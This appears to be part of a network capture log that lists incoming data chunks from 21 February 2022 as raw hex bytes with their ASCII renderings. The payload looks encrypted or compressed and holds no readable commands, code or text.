                                                                                                                                                                                                                              2022-02-21 15:50:17 UTC87INData Raw: a6 5a d1 d6 2e de a0 79 20 4b f2 4c eb 59 7a db 97 ed 7c 88 48 06 8f fe 1c 4f 1d d4 c2 9e bc 90 c5 dc 23 b9 7c 9e dc 21 90 14 ca dc 26 cd 60 89 83 3d bf 10 06 dd b0 f5 52 6f 80 87 9f 98 0f a6 96 03 c8 b6 f2 53 2b 92 53 9b 65 19 73 9e 5d a8 64 70 90 82 d5 7c df 9e 67 9c f7 aa 33 ab 5d 65 4c 27 cf 46 f6 b5 52 87 24 d0 8b 7d 8d 5a fb f5 d3 7d 4e 8c bb 62 4a 07 7f 0a d4 c2 5e 35 f8 e1 35 95 41 ea 61 1c aa 86 26 05 d0 5a ca 4a e6 ba 8c d1 dd c8 da c5 e9 fd 2c ae b0 a8 6a 29 23 a1 69 ac 62 1e 2f 37 e3 49 43 99 3c f0 74 41 49 c4 c7 bb f1 8a b2 bb a2 36 e3 82 3f 29 03 ef 27 49 18 53 94 bb e7 b5 32 c9 72 c0 54 06 2f d2 bd 72 c5 4b 78 72 56 b5 61 d1 f3 1c 57 08 a7 f6 78 4e 64 ba bb 46 b0 d4 ce bc 97 0b 85 fe a2 22 f4 e4 a3 ed 2c d7 d0 bc 7b bb e8 23 c1 3c ca 9a c4
                                                                                                                                                                                                                              Data Ascii: Z.y KLYz|HO#|!&`=RoS+Ses]dp|g3]eL'FR$}Z}NbJ^55Aa&ZJ,j)#ib/7IC<tAI6?)'IS2rT/rKxrVaWxNdF",{#<
                                                                                                                                                                                                                              2022-02-21 15:50:17 UTC89INData Raw: e8 25 59 ba c6 26 56 a2 5b d2 6b 13 c2 5f f7 7f 55 1d 33 9e ac fc 76 71 4b 1a 08 dc 4e 5a 58 6d f7 09 a7 70 0f 1f d7 45 38 fa 11 49 54 e4 03 53 70 11 ce fd 34 29 33 53 0e 05 b7 2f 0e c9 36 b4 40 57 bc 5e 37 a7 a1 56 11 ea 06 9f 41 54 7c 9d b0 d5 e1 04 b5 d4 3d 42 bc 2c 26 d6 f1 9f cd 5b df 61 db a2 67 90 df 29 11 86 16 4d fe 01 e2 20 e1 de 42 e5 8a de a6 5b 3f 06 ed 9d 19 eb dd b3 6a cc 16 aa f5 94 49 3c b6 f4 29 1b 1a 50 a5 a9 96 f9 2a df 8c a6 2e 82 c0 ab f8 60 03 88 b8 7e 9f 3d ea 62 c1 fe af 1d c1 a8 d0 86 6f ab f1 e9 f4 58 c6 4e 1b b8 d4 8f 9f 18 1e b0 a0 b7 26 00 f0 78 14 47 02 5f 1c 31 b8 3b d2 54 b3 fd a7 a1 0c 49 7a 50 57 f2 dc 4e 60 4e a5 09 d7 a5 03 aa 77 aa 0c 4e 1f 9f ec fd c4 fc 8e cc f9 16 f1 f1 08 87 30 90 7f d5 05 de a0 2b 24 b8 a1 7a 9f
                                                                                                                                                                                                                              Data Ascii: %Y&V[k_U3vqKNZXmpE8ITSp4)3S/6@W^7VAT|=B,&[ag)M B[?jI<)P*.`~=boXN&xG_1;TIzPWN`NwN0+$z
                                                                                                                                                                                                                              2022-02-21 15:50:17 UTC90INData Raw: ff d8 5d f4 63 12 ab 06 12 cf 44 17 ec 49 d6 64 c1 60 03 e8 7d bb 49 77 a2 f9 d2 40 ce 36 2a 22 10 b0 78 b2 bb e7 40 97 0e 9c b5 c1 aa 8b b2 2a ee 45 93 89 87 44 e6 8d 1c 8c 9d d1 a4 8d 0a 47 2e 15 33 00 86 de 32 68 26 14 b2 65 9e ce ee 65 d3 f3 dd ff c6 83 64 31 73 8b cf b0 cc 3f 5c 12 bb 98 aa d5 74 c5 51 45 0b da 35 fb c0 5d eb 69 03 49 0e 4c 8f 01 7d d6 a7 8e 7d 8a ec 81 46 e4 a5 3d 1f 02 d8 76 45 3c a1 d8 d2 66 bb 1e 1f 56 fd aa e2 31 fd 7e 76 23 02 54 4d bd cd 11 cd 5d 2d 16 f4 65 5c 47 f4 4b 60 56 d3 08 52 46 5b 9e 84 40 17 ea 93 a2 70 79 c8 e6 9a d9 7b d8 f5 4a e6 15 19 ba 02 74 d8 34 db d4 5e 08 40 b3 87 8f a0 13 54 cf 4e 96 fd 68 a2 9d b7 4e 4a ba 39 37 bb 64 10 59 3f 7d 18 fb a7 25 5a 27 59 84 55 a0 af bf 70 55 57 6e 65 60 3f 74 9a 58 1e ec d0
                                                                                                                                                                                                                              Data Ascii: ]cDId`}Iw@6*"x@*EDG.32h&eed1s?\tQE5]iIL}}F=vE<fV1~v#TM]-e\GK`VRF[@py{Jt4^@TNhNJ97dY?}%Z'YUpUWne`?tX
                                                                                                                                                                                                                              2022-02-21 15:50:17 UTC91INData Raw: b1 db c6 29 93 4a ad 38 eb b2 f9 c1 c5 2a 3a d9 a2 1d 0c 07 45 eb 1a 4c 33 99 31 a9 48 3d f1 62 a1 ab 21 8e 33 f7 ce 49 9b 4d fa 28 b8 30 7b bb e4 3a 7a 59 f2 43 35 eb eb e2 2f 1a 7f 1f 72 76 50 96 0c 9c 00 eb fd 4d 4f be 3f 6e cf 5a 3e c5 3c fe c1 81 07 40 69 51 7e 62 75 f1 40 7d 42 3c 10 b8 f2 5c 03 b9 4e e3 cf 6e 0d b4 f9 ec 7b 07 d2 4c df 00 57 e7 0e f7 7b 50 72 fc f0 4f cf 8a c1 9c b9 85 a4 72 4a 3a c2 d1 0b c8 07 62 e4 22 6e e9 b1 1e 39 44 fd 49 10 07 8d 73 1e ca ea 56 79 b1 5a 27 79 8c d3 ef 65 aa e4 03 81 f0 c4 4c 7d 6d 86 cd 49 39 d6 4e 55 99 0a dd b4 76 ab c3 a4 12 11 0b 6e 14 1b 92 d8 59 8d 9a 1d 2a 7e 66 63 c9 da a7 1c 9b 3a 96 6d c3 c4 a1 c6 d6 25 86 1f d7 56 18 22 65 e6 06 c0 3a 13 3b 68 c3 83 59 26 bd f5 7c 6a 9c 89 1f d3 51 28 de 27 c3 1f
                                                                                                                                                                                                                              Data Ascii: )J8*:EL31H=b!3IM(0{:zYC5/rvPMO?nZ><@iQ~bu@}B<\Nn{LW{PrOrJ:b"n9DIsVyZ'yeL}mI9NUvnY*~fc:m%V"e:;hY&|jQ('
                                                                                                                                                                                                                              2022-02-21 15:50:17 UTC93INData Raw: 99 37 c7 c0 8a 7e 3b f1 22 3f 87 85 ef 73 f2 12 6f 1a ad 29 6a 6c e2 1e 68 15 8f 92 65 66 81 a8 6a 79 11 b6 fb 8e a8 b5 48 51 f7 c9 90 7c f9 be 5f 41 52 e5 88 d2 44 25 79 a0 0e 7a 52 8d a4 44 ee 76 f9 4d db ae 5e 18 56 57 c8 6b fa bb ee f6 62 1e ae 96 88 0e 64 54 d6 ac b5 c9 80 82 c8 18 ae 6a 36 dc 6b c2 eb c3 77 25 4f 1b 33 39 94 bf 33 76 da 7f ce 88 cf d8 6f ab ae 6a 01 66 1d b2 e7 46 78 3b ed 77 af a6 b9 f7 1b 7c 55 5c b2 c2 92 66 25 40 b3 61 a7 6c b4 80 c7 79 65 f6 a6 9f ab ca 09 9c 14 07 61 fa 85 de 75 5f ab 34 ee 38 ef 5f 52 57 c2 85 f3 f0 ea 0e 0d 50 80 67 2c 67 5d 2b 2f 34 bb 74 2c 28 df 35 cf 47 94 2b 8a 0e f0 99 76 a0 f2 6c 7f 48 4b 22 0c 63 b7 e5 23 87 90 ba e7 63 99 15 10 3a 5b bb ac 35 94 c1 ac e1 4d 67 94 54 99 ac 56 dd 2c 48 67 ab 78 8c 08
                                                                                                                                                                                                                              Data Ascii: 7~;"?so)jlhefjyHQ|_ARD%yzRDvM^VWkbdTj6kw%O393vojfFx;w|U\f%@alyeau_48_RWPg,g]+/4t,(5G+vlHK"c#c:[5MgTV,Hgx
                                                                                                                                                                                                                              2022-02-21 15:50:17 UTC94INData Raw: c2 7a 14 c8 10 ff bf 6d d0 30 e9 2e af dc e7 ac ae 5f 61 d7 e3 0d c1 6c ec 7b a9 d4 4c f8 76 57 e7 e9 73 21 d0 a5 78 f5 a4 f4 71 6c 49 d0 2d 8a 8d 36 f1 7c 84 53 78 0a bd ec 53 fa e9 b1 b1 81 32 76 76 10 57 8d 72 ef 5e ea 56 d7 bf 08 e7 39 64 81 fb 8d 10 29 76 89 40 db df 52 42 65 91 cf 46 a4 20 ae e9 bc 22 dd be 33 a6 e0 ed e1 02 3d ee e6 6d aa 5d a8 66 f7 69 96 8f 0d 21 eb d9 dc f3 bf 50 75 a9 95 46 06 a1 5c 81 1d 79 cf c1 f1 75 57 bd c0 2d 80 8b 90 3e f7 30 d3 24 4b b8 7a 4b e1 c0 38 5b 65 8c cf 12 22 fe bd ce 17 af 15 2a 68 c6 e4 17 64 90 c8 51 50 a3 78 32 e6 c7 2d fa 1c 0e 18 3c 51 df ff bf 1c ca 1a d6 34 62 44 29 4f b1 ce ad d8 f5 af f2 7d 86 56 49 cb 7a 0f fb ea 86 8d 3f 49 ec f7 38 c4 50 aa 4d 46 e1 38 1f 14 7a 40 7c 26 09 69 6a eb 3a e9 a6 c0 cb
                                                                                                                                                                                                                              Data Ascii: zm0._al{LvWs!xqlI-6|SxS2vvWr^V9d)v@RBeF "3=m]fi!PuF\yuW->0$KzK8[e"*hdQPx2-<Q4bD)O}VIz?I8PMF8z@|&ij:
                                                                                                                                                                                                                              2022-02-21 15:50:17 UTC95INData Raw: 8f c2 4a 7a 2d fc 5f 27 ca d5 b8 55 d6 93 28 4e bd ec 40 01 10 d0 b6 67 70 54 2f 5f bb ad 62 48 29 cd 93 14 ce a5 94 de 63 ec c7 61 a6 bd 67 45 c3 61 e7 d1 50 1d f3 24 70 2c 8c d5 bf b5 e3 23 5f f2 a9 d2 5f ca 33 e8 a3 22 9e 04 32 3a 98 72 d0 83 c8 de 56 73 66 cc 4b db 19 5c ae f0 73 51 be cd ad cd 66 02 18 be f8 a5 44 9f 4c 1b e1 4d 8c cb e0 d9 6c b2 6d 88 eb 01 1b 65 8c dc 53 82 3b ad 6c aa bf af c0 3b d9 c2 64 6a c8 79 76 ef 21 7c 7a 15 ea e9 02 fc a0 78 35 9a ae b4 ef c7 2d 4f 6f f2 35 84 2d 7a cf 3b b2 f5 78 37 83 9e 98 23 ca 91 50 60 de 68 ef 0b ea e2 4e ed 4c cf 6d 59 34 ad b5 90 af d8 44 90 67 04 c5 09 82 ca 20 d5 99 9d cb 67 3f 16 dd 86 c9 32 c5 bb 00 76 e4 8e 8c a8 60 30 c5 56 cd ca 36 4b 56 32 6f 51 fd 0f 1a 05 28 8c 7d e6 33 57 68 af 29 04 b3
                                                                                                                                                                                                                              Data Ascii: Jz-_'U(N@gpT/_bH)cagEaP$p,#__3"2:rVsfK\sQfDLMlmeS;l;djyv!|zx5-Oo5-z;x7#P`hNLmY4Dg g?2v`0V6KV2oQ(}3Wh)
                                                                                                                                                                                                                              2022-02-21 15:50:17 UTC96INData Raw: 5d fc 0c 26 98 0e 7e 86 c7 33 dc 1f 4f 46 e8 fc a5 a3 27 84 44 b7 e0 be 06 6c d1 ec e6 3e 4f f8 02 0c d9 6d 96 38 1d de 14 67 51 03 e8 ba 20 b7 3a 34 e1 4f 2d 2b 7a 7f fb a0 bd a6 54 bd b2 80 06 35 54 76 2c 4e fa 1b b4 47 f4 d1 11 19 53 ab 67 de 27 ff f6 d0 91 d9 9e 60 40 b2 b1 b8 65 1d 9b 6f 2d ea ad ac d7 7e 20 bf 7a 23 b0 a2 73 4e 2b 3a 4d d8 b2 72 af ca f4 9d c9 f7 41 47 b0 b9 8f 4d 23 53 ea 86 2a 72 aa a8 d5 9a e6 63 d0 fc e4 99 de 81 af 85 b3 1c 40 40 96 19 f1 0d ea 2e ce dc 7f 31 eb 35 d4 97 d5 b8 16 df e6 d7 0b 81 00 10 94 0c 69 78 a6 68 b8 a4 41 e2 2c ad 6b 57 f0 62 e6 f9 c1 be b0 c9 2d 5b ad 64 e5 19 10 4c 61 84 28 ec b6 55 96 ee 89 15 8f b5 77 d2 59 95 53 85 f3 9e 4d 46 14 16 4e 74 23 1b 15 2c 19 0c fa ee 3b f4 1d ae 1d 50 e1 4a e1 9d c4 d1 80
                                                                                                                                                                                                                              Data Ascii: ]&~3OF'Dl>Om8gQ :4O-+zT5Tv,NGSg'`@eo-~ z#sN+:MrAGM#S*rc@@.15ixhA,kWb-[dLa(UwYSMFNt#,;PJ
                                                                                                                                                                                                                              2022-02-21 15:50:17 UTC97INData Raw: ee 81 09 7b d2 0e 39 1b be d4 e2 8c e3 3e d2 cb 4c a7 49 04 6f 64 6a 67 bc a7 e1 95 9f bd 6c c5 94 37 9d 3c 32 e7 b7 5c a6 88 c9 c4 67 a6 57 83 2f 18 c4 1a ef d2 d9 4b 94 7c fc db 1c 08 cb 9f 26 68 9b f3 9a 37 e2 ca 54 53 78 36 6a a1 a3 45 9d 1b aa 5a af 54 8e 12 56 00 fe ea 65 42 41 7c 21 cc e3 3e db 3b f0 90 10 a2 80 45 63 5b 03 c8 c1 09 91 e0 fe 1e c3 20 f2 99 2f dc 20 ca e2 ec 60 be ea 60 2a 8e e4 72 ec e9 5b 26 c4 81 08 f0 f0 11 c9 b6 a4 cf cf 20 22 29 4a 67 9b a0 7e e2 1b 69 1e fd c8 67 cb 7a 15 16 f3 68 b7 39 5f 11 b9 0e 45 f1 d9 76 1f 8b 34 ed 9b c7 9a de 94 c2 76 e8 a8 f0 a3 a6 b9 c9 46 89 f6 cc 5f 5e 24 92 00 ed a2 6c 8c a7 cb d5 34 95 48 ff bf b3 5d b7 29 21 4d 6e a2 1e 50 2e fd 97 f6 76 b8 50 ad fe df f4 93 4c 84 b5 e9 fa 4c 39 c3 fe d8 81 28
                                                                                                                                                                                                                              Data Ascii: {9>LIodjgl7<2\gW/K|&h7TSx6jEZTVeBA|!>;Ec[ / ``*r[& ")Jg~igzh9_Ev4vF_^$l4H])!MnP.vPLL9(
                                                                                                                                                                                                                              2022-02-21 15:50:17 UTC98INData Raw: 6d c5 b7 93 bd e0 ed 0c cb 0b c3 b9 ed 0b b4 cd 6c 3b a3 01 f0 26 4a f7 a1 f9 0e 95 dd a3 7e 7d 5b 87 30 6b c6 18 c9 c7 2c 51 a0 16 cd b2 20 2d c1 fe d0 bb 55 59 72 5b 0e d1 99 d8 60 10 c5 60 c3 82 45 4c c3 1d 71 31 3c 53 eb a7 5d 95 c9 d2 6b b9 6e fb a8 8e 28 b3 b7 68 73 6b dd 5d 13 25 b7 e3 53 d7 8d b4 43 27 c1 9b b9 e6 5a ca c1 87 d7 a7 67 c0 a0 68 4a bb 9b db be 3a 48 f2 4c 45 d0 d5 a7 31 8a 13 d4 a7 82 70 c3 9f 48 3a 6e 41 5c 2f 2e 7a 1d 60 6a 0c 6c 50 4b 51 ba 16 73 e1 87 ea b9 c7 29 ee 16 a5 6e bd 9a ad 7b bb 90 c9 0e 57 99 87 2d 50 0b f2 35 84 29 74 15 f3 eb 76 6f b6 f9 96 e4 9a 29 06 b8 1f f4 79 fe d3 28 a7 3f 37 e5 50 b5 ae 94 0c bc f3 1f be 87 5c 20 27 6a 66 15 84 4c ad 90 84 f2 eb ed 26 c5 bf c9 9b 1e 26 31 27 e6 d9 86 6a 84 81 8e e4 3a f1 b8
                                                                                                                                                                                                                              Data Ascii: ml;&J~}[0k,Q -UYr[``ELq1<S]kn(hsk]%SC'ZghJ:HLE1pH:nA\/.z`jlPKQs)n{W-P5)tvo)y(?7P\ 'jfL&&1'j:
                                                                                                                                                                                                                              2022-02-21 15:50:17 UTC100INData Raw: 5c 13 43 57 00 7d 2a 34 45 24 ae 0b cd e3 68 dc 3b 7f 5c ef 5d 80 45 7f 6a 48 7e df be cc 23 f6 9b c9 fd e5 33 69 e5 20 43 e1 08 45 3f 79 1c 6f 22 61 79 83 e5 51 1a 6e f5 8a b2 cd c3 b9 97 c6 b1 04 22 c1 c5 eb 8b 5b f3 96 bb 0f a9 48 ff 7d fd 11 b6 b0 62 5e fd c5 83 59 f6 f6 3b ba 79 9c df 22 3a 08 8d f0 21 56 e1 39 f8 ca 61 ed 1d 2a 0b e2 5e 03 64 1b 30 0a f9 25 92 03 e4 e4 88 74 58 34 b0 51 22 49 ff cb 1b 19 36 c1 8e 9d 31 b5 52 50 26 26 95 ad 72 2e fd 43 8c b6 9a 74 4f c9 32 d8 d6 b4 fc 59 78 87 b9 44 c6 f0 cb bc c0 4e ed 2c 63 63 22 bf 00 66 60 b7 1f e0 dd 3b fd 98 46 30 0d 4c 15 00 28 56 9e 87 b0 80 13 32 be 2d 46 dc 6d 36 06 89 92 43 9f 5f 48 71 9e 36 76 9b 8f 98 0b 35 ac d5 c8 86 39 c2 69 8e e3 15 b4 df 20 ea d0 3b f8 a2 51 45 c4 00 b9 db 1c 98 e5
                                                                                                                                                                                                                              Data Ascii: \CW}*4E$h;\]EjH~#3i CE?yo"ayQn"[H}b^Y;y":!V9a*^d0%tX4Q"I61RP&&r.CtO2YxDN,cc"f`;F0L(V2-Fm6C_Hq6v59i ;QE
                                                                                                                                                                                                                              2022-02-21 15:50:17 UTC101INData Raw: d5 5d 83 b7 4a 58 00 57 60 13 51 49 3d 0d 7c 4d 60 bc 6c 16 18 67 e3 19 50 1f dd b3 a7 24 8d 79 ea 8a 6c c4 93 67 34 6c 3b 85 ba eb 56 d8 46 54 cd d4 a5 d6 45 b7 28 58 6c 71 6a b5 51 57 f7 d9 fc e2 72 48 06 6f 83 85 41 5f 6a 43 a7 20 44 e7 b4 b9 20 aa 59 07 fd a0 0a 69 1c 04 88 dc 5a 90 be b8 79 70 0f 62 3e 8c e0 8d ed 40 ba 57 cb df 3c 3e c1 b8 50 b5 80 6b 49 67 af 3d e9 d1 d1 f0 a2 40 5c 64 bc ee b1 14 6f 3d 2c bc 49 8a 1e 4e ad 01 07 dd e2 31 86 3a 2f 5c 75 ff 53 6c c0 54 6a 04 6c 6c 35 18 f3 91 8a bb de 05 90 80 25 ea eb b8 30 ab 48 e4 31 bb 5f 46 0e f7 03 73 f6 e9 cc df 1f 69 b7 8a 47 6b 5f 86 c2 ae 5f 6c bf 49 55 7b 7a cf a0 07 7e a6 67 64 de 72 d5 70 f3 d1 34 6a e9 39 8a 9f c2 91 83 65 0c 9a 42 7f 5f d1 c3 4b 49 61 55 69 15 41 98 59 e1 3a 76 37 43
                                                                                                                                                                                                                              Data Ascii: ]JXW`QI=|M`lgP$ylg4l;VFTE(XlqjQWrHoA_jC D YiZypb>@W<>PkIg=@\do=,IN1:/\uSlTjll5%0H1_FsiGk__lIU{z~gdrp4j9eB_KIaUiAY:v7C
                                                                                                                                                                                                                              2022-02-21 15:50:17 UTC102INData Raw: ba 90 3e f7 f3 57 bb 0e a4 f2 d1 91 cb ff 4f 37 55 72 bd 4e 75 f8 36 30 66 58 26 b1 db 56 53 35 6f 97 44 f2 6f 1b 3f 30 ac c0 f8 1d 3c d3 f9 c4 e1 6a 65 89 9a a3 6c bb 56 48 a2 d9 43 8a 45 7c a9 22 7f 9e 2c bd 3d df e7 00 8c 61 05 49 2b 4b 8f ad 54 95 af 12 17 96 6f 04 12 69 a3 b5 de 96 1f 6a 23 67 38 01 39 88 b0 3a 56 f3 52 c6 8d 40 ae cf f4 fc 87 a1 0d a3 62 b2 1d 46 8a 6d 57 27 75 19 06 1c 60 54 aa 33 58 d9 d6 9b 90 82 d1 75 0b 95 fc 29 21 2c b2 b2 9e eb e7 70 47 88 23 bd 89 48 bc 8e 4a 93 9d 5d fb 4c 54 68 17 55 1b b4 e5 92 a7 e3 10 83 88 da 9a 66 d0 c8 d4 86 49 4d 8b 0d 53 96 0e 40 ca 42 ee ba bc d1 d3 58 c6 95 e9 af 3f bb 37 87 62 2a f8 47 30 aa 9d cf f2 6d 24 95 49 99 a2 cd af 4f 9d 76 c7 1b a4 c2 c6 6a 81 71 40 9d 27 f3 80 d4 32 55 93 2e d6 66 4b
                                                                                                                                                                                                                              Data Ascii: >WO7UrNu60fX&VS5oDo?0<jelVHCE|",=aI+KToij#g89:VR@bFmW'u`T3Xu)!,pG#HJ]LThUfIMS@BX?7b*G0m$IOvjq@'2U.fK
                                                                                                                                                                                                                              2022-02-21 15:50:17 UTC103INData Raw: 42 22 40 7d b4 42 59 1d 40 7e 04 32 54 f2 be 52 c9 fd d9 aa 6c b0 32 39 c2 52 3d 57 60 d5 e8 8d a0 78 be d3 2a a3 e4 37 d7 0a e4 51 19 0c ba bb 3f 27 80 6d f9 48 92 77 6d 20 87 e9 f8 de c6 bf 31 22 a1 3c 3e ef 1d 4b 37 4d e4 d8 65 2a 06 63 19 96 75 17 b7 de 8e 93 c0 46 de e0 33 3e a3 d9 e4 e8 ae b0 1c 1d a6 43 7b 2e ee cc 25 c4 7d 40 d3 51 26 ca f2 71 45 c8 57 13 e2 00 2a 16 e6 a3 dc 7a 09 33 6c 55 71 98 6a 78 94 6e 8b a0 d0 4e da 1d 71 ec b8 52 c7 d7 e3 7b b5 4f a7 c2 af 08 f2 d6 14 c2 b8 fc d3 b2 72 9c 74 22 14 52 c0 9d f0 ff 2d 17 3d 87 09 83 ff f6 a4 28 6a 99 7d db f9 1b 5f 4f b6 41 5c b6 e2 ad e0 6a 6d 3d 81 9d de 81 5f a8 fe 64 b5 1d 33 0a bf d2 d1 38 11 10 5c de 7e d7 74 35 f8 57 6b 70 c3 5d 32 85 4d 13 db cf 93 b9 4e 46 6f db b5 ea 4f 55 9e 34 2e
                                                                                                                                                                                                                              Data Ascii: B"@}BY@~2TRl29R=W`x*7Q?'mHwm 1"<>K7Me*cuF3>C{.%}@Q&qEW*z3lUqjxnNqR{Ort"R-=(j}_OA\jm=_d38\~t5Wkp]2MNFoOU4.
                                                                                                                                                                                                                              2022-02-21 15:50:17 UTC105INData Raw: 4b 4d 5a 27 8d ba 9a e9 b8 7f 26 8c fb 95 14 b6 9b ea 58 fb a3 cc 3d 1f 41 4e 05 10 e5 5b d3 8b cb c2 0b 28 6b f6 5b 57 78 4f c8 34 15 09 20 21 00 aa 33 ac d9 97 1f 9e 42 55 24 4e 49 a1 85 23 51 33 ff 22 66 c8 30 b3 2d 16 65 91 78 06 4f 45 38 1e 70 6c a0 52 55 03 ab 08 ce b8 a8 68 8c be 2d fa 3a cc 6a ba c8 d4 81 49 d0 29 f2 ac 96 0e a0 c8 05 7b 72 fb 46 94 80 e1 0e 59 22 5c fc 57 c4 e3 e0 73 49 62 fa e3 25 ac 33 19 b5 0c 5e cb f3 30 21 ce e8 bd df 95 49 8d 84 a8 6e 7f 7a 64 a6 84 75 f2 61 6c 5a 89 f0 a3 34 70 c2 45 3c 6c fd 83 96 ec 31 72 cf 76 f9 b3 6b a5 ed 9a 70 b9 8d 35 5b 3f c7 db f7 0b 90 9f be 87 bc b6 d7 7b 9b 21 5e 74 f7 e4 8e fd 3d a2 0f 13 b6 35 63 2a ca 38 0f 39 df cf 1c a0 49 63 79 2f ca 40 35 c7 85 2a 51 1c 7c 13 2a 8d 82 8f 0d 62 db a3 82
                                                                                                                                                                                                                              Data Ascii: KMZ'&X=AN[(k[WxO4 !3BU$NI#Q3"f0-exOE8plRUh-:jI){rFY"\WsIb%3^0!InzdualZ4pE<l1rvkp5[?{!^t=5c*89Icy/@5*Q|*b
                                                                                                                                                                                                                              2022-02-21 15:50:17 UTC106INData Raw: 0d 07 90 60 23 f0 e1 d8 32 a5 17 f0 63 eb a0 1c 1d 52 4b fa ce 37 53 8b 97 79 b3 52 82 3e ed bc 81 4d 0a d8 da af b1 70 7a 44 b3 a7 1d cf 82 65 83 01 09 64 c1 97 fb a6 64 7e 42 02 d5 31 47 c9 be b5 4d e5 7b 82 e7 58 3d a7 99 e6 d4 17 d2 b6 32 24 6b 30 26 c2 21 3a f3 1e 9a fd 25 4e 67 63 0e 3c c6 2e 75 71 89 a6 a1 be 8e 72 31 92 23 bf 41 51 b6 3f 89 f6 6b b1 65 c7 6a 21 7e 82 ae 02 50 e4 f5 1b 7a 15 21 d1 78 96 e7 0a 98 0c 89 8e 63 3b 37 87 00 09 bd 82 ec e5 00 40 cb 16 f0 46 cd 4d d7 89 82 c1 51 ef d6 3c a6 f2 f6 07 bb 18 7c 05 c0 91 9f 7f 34 e0 8f 4e e7 7f bc 2c d1 75 71 ff ca 54 d0 57 20 dc a1 64 93 3c 9e 3a df e9 74 f8 ee 57 4c ce bb 76 96 51 25 4e 3a e3 3e a7 58 fb 99 4b fd 5d 0a 96 5d 9f 13 fb fd 3b 0b 20 d0 27 fc 37 a3 a9 91 28 14 dd 91 bb 29 c3 1f
                                                                                                                                                                                                                              Data Ascii: `#2cRK7SyR>MpzDedd~B1GM{X=2$k0&!:%Ngc<.uqr1#AQ?kej!~Pz!xc;7@FMQ<|4N,uqTW d<:tWLvQ%N:>XK]]; '7()
                                                                                                                                                                                                                              2022-02-21 15:50:17 UTC107INData Raw: 20 7c f7 de 5d a4 b3 75 15 7d ee 2d fa 38 f1 82 53 6c 7d 29 22 ad 97 88 93 68 54 d7 77 3e b0 29 84 10 0f af 12 99 e9 1f 72 28 37 84 76 24 2d c2 87 a7 a1 b5 1d 0f 81 22 87 95 bf f6 2b d9 7e 12 c4 d6 24 29 66 34 d4 1b 68 96 e4 cf 1b 29 b7 ac 55 8c 52 de 40 09 e4 aa 7d c3 19 0a 1d 15 85 ab a5 19 a5 12 be 78 65 d5 70 b9 98 36 b9 c4 21 0f 4e d2 ab 8a 0b e9 50 9c 31 6c a1 21 6c c8 7f a1 b3 66 c1 53 cd 48 79 c6 61 34 4b 2c 3a 60 4d f0 3e c1 12 fc 3a 4b 1c 60 a1 d7 c0 15 87 3c e2 83 ec 40 12 44 48 5d 00 f0 5d 7d 5b 7b 89 05 3c 93 61 f1 3b 93 66 58 99 78 7f 78 61 ec 6d 43 b2 3c 9e b5 a9 27 b6 4b e6 96 a1 c9 54 aa c4 fe 70 ed f1 dd 66 ea df c4 24 f6 fa ff 00 05 2d e9 f7 08 74 37 61 47 d2 eb 4f c3 53 c2 59 6a 69 de 4c a0 50 a6 b9 7c 0d 33 c6 96 2e a8 4f 2d 36 ba 4b
                                                                                                                                                                                                                              Data Ascii: |]u}-8Sl})"hTw>)r(7v$-"+~$)f4h)UR@}xep6!NP1l!lfSHya4K,:`M>:K`<@DH]]}[{<a;fXxxamC<'KTpf$-t7aGOSYjiLP|3.O-6K
                                                                                                                                                                                                                              2022-02-21 15:50:17 UTC109INData Raw: af 31 94 5f ca d5 84 a0 8d b8 92 d9 f1 86 ff 23 65 de 09 16 cf 83 f9 a8 e8 09 61 4b 2f ea f1 c7 e2 4f e8 d2 c6 54 85 0a ec a5 d5 89 e1 4d b8 c4 e2 88 18 6c c2 3c 89 8f 81 07 a1 23 6b bc 1f a1 5f 55 bb bf 6c 46 db 70 4c ae 11 9b cf 29 e2 80 4c 37 c1 b7 96 06 60 02 c0 02 1b e5 58 08 d2 10 a0 79 99 07 65 91 47 ea 43 eb 4e ca b3 c6 d9 54 8d da ef 61 d6 19 5e 5e 75 1b af b7 c0 40 43 8b ae e2 0d df df 27 6e 47 b3 7c 07 93 b1 8e c7 f0 00 47 23 eb 51 1d 1a e0 9d a8 3d 4f c8 62 35 f6 f4 b6 c8 eb b6 e0 ed 65 c3 1f e3 51 26 21 8b 45 00 f1 7b fd a2 3d a8 ae 16 27 5a cb fb fe 6f 9b 94 d0 d0 45 23 21 18 cf 5f cd 2e 08 99 08 c2 cb 3d 7c b5 31 ae f2 f9 3f ae c1 d1 d3 48 3b 3d 5c df 52 a5 95 bf 81 a7 5d e5 45 6f e3 50 34 07 57 50 18 d9 24 e8 df df 66 e6 71 b0 41 e4 c1 d5
                                                                                                                                                                                                                              Data Ascii: 1_#eaK/OTMl<#k_UlFpL)L7`XyeGCNTa^^u@C'nG|G#Q=Ob5eQ&!E{='ZoE#!_.=|1?H;=\R]EoP4WP$fqA
                                                                                                                                                                                                                              2022-02-21 15:50:17 UTC110INData Raw: 66 1a 9a af 0a 7b 83 10 5d 01 a8 60 99 1e b2 6e 37 12 de fd bc 7f 8b e1 71 1f 19 3a 44 a7 46 b0 06 2e 59 28 d9 7d 61 7c bf 93 2a fe 6e 62 03 3b c9 78 ce 68 b9 8b 69 86 96 45 89 83 4a 82 59 a4 44 9b ac e4 3c af 70 97 4b 0e d0 67 1d 92 82 8f d6 15 a0 87 09 9c b5 38 9d 3c a3 91 51 2f 44 a4 a8 14 5f c1 a8 4a 5c 19 83 e8 4a 9a 89 58 c5 0f 79 30 2d 9d 92 ae fe 02 ac 8f 8b 02 e0 43 b8 aa da 6b 63 51 28 93 29 7c 2f 35 7c 66 38 97 c6 94 15 25 c8 33 6a ea 21 c7 21 e6 2f 1b 2f 22 de 11 cb f1 b1 1f 1b 92 79 5f e9 1d 01 1d 65 ed cc 13 0f a0 13 67 d8 a9 13 04 8d 96 e2 6d e1 f7 81 24 5c e0 74 5c da aa bc ae 63 fc 79 80 2b 5a 2e de 93 93 fb f5 cd bb 0e 78 ef 16 fd 35 20 f5 72 87 d5 71 9c c3 1e ab 19 4c 83 9d 1a cd 6b 9e 8b c6 be 35 2c d5 03 8b b6 37 84 56 3e e3 c3 05 b7
                                                                                                                                                                                                                              Data Ascii: f{]`n7q:DF.Y(}a|*nb;xhiEJYD<pKg8<Q/D_J\JXy0-CkcQ()|/5|f8%3j!!//"y_egm$\t\cy+Z.x5 rqLk5,7V>
